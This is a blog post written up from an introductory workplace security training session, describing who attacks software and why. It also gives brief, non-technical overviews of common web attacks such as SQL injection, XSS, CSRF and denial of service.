Defence against the black hat - Know the enemy

This blog post a write up of the first of some security training that I have presented at my work and was titles know the enemy. In this training, we covered the following. - Who is the enemy? - Why do they attack? - The types of attacks they use # Who the enemy is? In the world of application security, there are lots of different groups of people that can be considered attackers or the enemy as they are dubbed in this training. The groups that were highlighted in training where: - Criminals - Governments - Competitors - Employees - Activists and disruptors - Researchers ## Criminals The criminal group is probably the first group you would think of when you think of someone who would be attacking your software. Depending on your definition of criminal, it could also include most if not all the other groups. For the training though criminals are an organisation of people how to carry out illegal actions to gain wealth. This group of individuals has been growing especially in the last ten years thanks to the creation of cryptocurrency which removes or reduces the ability for authorities such as police or federal agencies to track the money gained from attacking applications. ## Governments It has been a growing concern for governments since the creation of the computer that information and secretes could and would be lost through the use of technology. This has led to an arm’s raise for governments to not only protect from and deter hackers and spy’s but to equip their own military’s and spy agencies with the abilities to attack and defend. Today every superpower in the world is at war in cyberspace these wars are not declared formally, but every day 1,000,000’s of attacks are sent from country to country in an attempt to find any small breach in a nations infrastructure that could be used or leveraged. A good visual for this can be seen [here]( Some governments have been helping businesses and citizens to protect themselves and their customers by running schemes such as the Australian government funding penetration testing for small to medium businesses. ## Competitors Although illegal in most states around the world, it has been known for industrial spying and sabotage to be carried out by competitors or in some cases their law firms. This can allow a competitor to gain the upper hand on the competition by gathering details of customers or information about future advances. A competitor could also deface or change the competitor’s products so that confidence in the product or company is lost. ## Employees Current or past employees could be the perpetrator of an attack. There are many reasons this might happen, but as the employees have had access to confidential information, they are one of the best placed and informed attackers we can come across. ## Activists and disruptors This group are generally driven by altruistic courses and usually have a mission or message they wish to spread. This group of attackers often effect business carrying out activity’s that some part of society sees as wrong and generally they would carry out attacks to stop this sort of business been carried out or to find information to prove illegal or immoral practises been carried out. ## Researchers There are a growing number of people in the world whose job it is to find vulnerabilities in software and ether report on it or write papers about it. This groups growth has been helped by grants and schemes been created by governments and businesses that allow people to be paid for finding these kinds of issues. In 2019 several people where paid over $1,000,000 US each for finding only one issue each instantly becoming millionaires overnight. Google has changed it's scheme where they will pay people who find and responsibly disclose issues in any app in there play store with more than 1,000,000 downloads. This group would also include penetration testers who are paid to carry out attacks against you generally by you or your company. # Why are they attacking Some of the reasons for an attacker to attack have been discussed above, but the ones that we highlighted in training are: - Profit - Political - Reputation - Legal Although there are other reasons, these generic terms cover most of them from a top-level. ## Profit A profit can be gained by attacking software; this can come from legal or illegal sources. The groups that we would consider to be driven by this motive are: - Criminals - Competitors - Employees - Researcher’s There are many ways in which an attacker might gain profit from an attack, but some of the more common are by selling data, contractually (such as hackers for hire) or schemes (such as bug bounty’s). ## Political As the use of software grows taking over every part of our lives, the political impact of a security failing increases. From governments tracking dissidents and terrorists to activists uncovering illegal activities by governments and companies. The zeitgeist can be changed by attacks that are driven by this motive. Also, as elections are increasingly digitised thought the world, the impact of attacks on these systems could lead to a political crisis like no other. The main groups that are driven by this would be: - Governments - Activists and disrupters ## Reputation The reputation of a company or its products can be affected by an attack; this can be down to several reasons, such as a data leak or defacement of the application. The effect of reputation been damaged can be long-lasting and can lead to loss of business, especially in a world where news lasts forever and is easy to search for and find. The main groups that are driven by this would be: - Competitors - Employees - Activists and disrupters ## Legal The legal implications of an attack on a company or its products has always been a concern but since the 25th May 2018 it has become more a concern for companies to protect customers data due to the enforcement of GDPR which can allow the European Union to find a company for a breach of data 20,000,000 Euro or 4% of the years turnover depending which is higher. There are lots of other legal issues that would be raised by a breach such as insurance claims and contractual failings. The main groups that would focus on this are: - Governments - Competitors - Activists and disrupters # The types of attacks they use Finally, in training, we covered the types of attacks that an attacker might use. These are not the only types of attacks but are some of the common ones that are generally used against a web application. The types of attacks that we highlighted are: - SQL injection - Cross-site scripting (XSS) - XML Injection (EXX) - Social engineering - Man/Monster in the middle - Cross-site request forgery - Denial of service (DDoS) - Credential gathering We talked briefly about each of these, and what kinds of outcomes they can lead to. More sessions will be held on these types of attacks in the future, so full details of these attacks will be covered then. ## SQL injection This is probably the first or second attack type you would think about if you where asked to name some security vulnerabilities. This sort of attack allows an attacker to run their SQL against the databases that an application is connected. This can allow them to create / read / update / delete the data stored. The results of this sort of attack can lead to data loss or leaks, access to the application been compromised, corruption of data and in some attacks cases illegal activity’s been carried out with corporate infrastructure. ## Cross-site scripting (XSS) This is another type of attack that people are very aware of. This attack allows an attacker to inject some form of client-side script into a legitimate user’s computer and can be used to perform actions as the user. This can lead to data leaks or data loss; it can also allow for an attacker to get the login access for that user as well as other actions been taken. ## XML Injection This sort of attack can be used to put data into a process that would ether course the process to not work correctly or for it to use incorrect data. The sort of attack can be used to change the behave of an application or the data it shows. The results of an attack like this can lead to a product been unusable; it can also allow for more sophisticated attacks to be started acting as an entry point. ## Social engineering Social engineering is a growing attack vector as it doesn’t require much if any technical knowledge and can be used to gain access to a product. This sort of attack can be used to get access to a system it can also be used to get information about a system or company. Depending on the targets of a social engineering attack, the results can vary at worst and attacker might get access to an admin account and the ability to change data. ## Man/Monster in the middle This attack requires the attacker to sit between the victim and the product and intercept messages between the two. This sort of attack is hard to pull off generically, but for a targeted attack can be very easy. Depending on the resources, an attacker has different levels of data can be gathered from username and password to private information. ## Cross-site request forgery (CSRF) This attack allows an attacker to send requests to the product as if it was the product. This is generally done from another site that targets are ether directed to or would naturally visit and results in the product thinking that a legitimate customer has acted. This can lead to data leaks or data loss and is a natural type of attack to carry out when a product has not implemented the correct protections. ## Denial of service (DDoS) A DDoS attack is probably something you know about or have heard about; this attack makes it impossible for a product to be accessible or usable by anyone. This can lead to reputational damage and customers moving to other solutions. ## Credential gathering This type of attack focuses on typing to gain access to a system or gathering information about users of an order. The results of this kind of attack are user logins are compromised, or customer details are leaked.